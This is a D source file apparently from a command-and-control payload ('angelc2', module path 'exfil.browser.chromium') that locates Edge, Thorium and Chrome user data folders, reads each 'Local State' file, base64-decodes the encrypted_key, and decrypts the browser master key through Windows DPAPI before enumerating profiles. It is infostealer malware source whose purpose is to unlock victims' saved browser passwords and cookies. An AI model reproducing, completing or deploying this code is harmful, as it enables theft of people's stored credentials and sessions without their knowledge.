angelc2/full/Angel-payload/angel/exfil/browser/chromium/chromium.d

module angel.exfil.browser.chromium.chromium;

// Internal imports
import angel.utils.constants;
import angel.utils.logging;
import angel.exfil.browser.chromium.dpapi;
// External imports
import std.stdio;
import std.string;
import std.file;
import std.base64;
import std.Path;
import std.format;
import std.json;

class Chromium {
    private {
        string localst;
        string[] profs = ["Default", "Profile 1", "Profile 2", "Profile 3", "Profile 4", "Profile 5"];
        string[] paths = ["Microsoft\\Edge", "Thorium", "Google\\Chrome"];
    }

    public void entry() {
        Logger.log(LogLevel.Debug, "Entered chromium");

        foreach (path; paths) {
            string pat = buildPath(Constants.local_appdata, path, "User Data");

            if (exists(pat)) {
                Logger.log(LogLevel.Debug, format("Browser dir %s exists", pat));

                this.localst = buildPath(pat, "Local State");

                if (exists(localst)) {
                    Logger.log(LogLevel.Debug, format("Local State file %s exists for browser %s", localst, pat));

                    ubyte[] master_key = this.mkey();

                    if (master_key is null || master_key.length == 0) {
                        Logger.log(
                            LogLevel.Debug,
                            "Master key contains 0 bytes, possible uncaught/unknown error. Skipping..."
                        );
                        Logger.log(LogLevel.Debug, format("%s", master_key));
                        return;
                    } else {
                        Logger.log(LogLevel.Debug, format("Decrypted master key: %s", master_key));
                    }

                    foreach(prof; profs) {
                        string profpat = buildPath(pat, prof);

                        if (exists(profpat)) {
                            Logger.log(LogLevel.Debug, format("Profile %s exists for browser %s", prof, pat));
                        }
                    }
                }
            }
        }
    }

    private ubyte[] mkey() {
        string bjson = readText(this.localst);

        JSONValue json = parseJSON(bjson);

        string encoded = json["os_crypt"]["encrypted_key"].str;

        ubyte[] bdecoded = Base64.decode(encoded.strip());

        ubyte[] bkey_crypt = bdecoded[5 .. $];

        ubyte[] dat = dpapi(bkey_crypt);

        return dat;
    }
}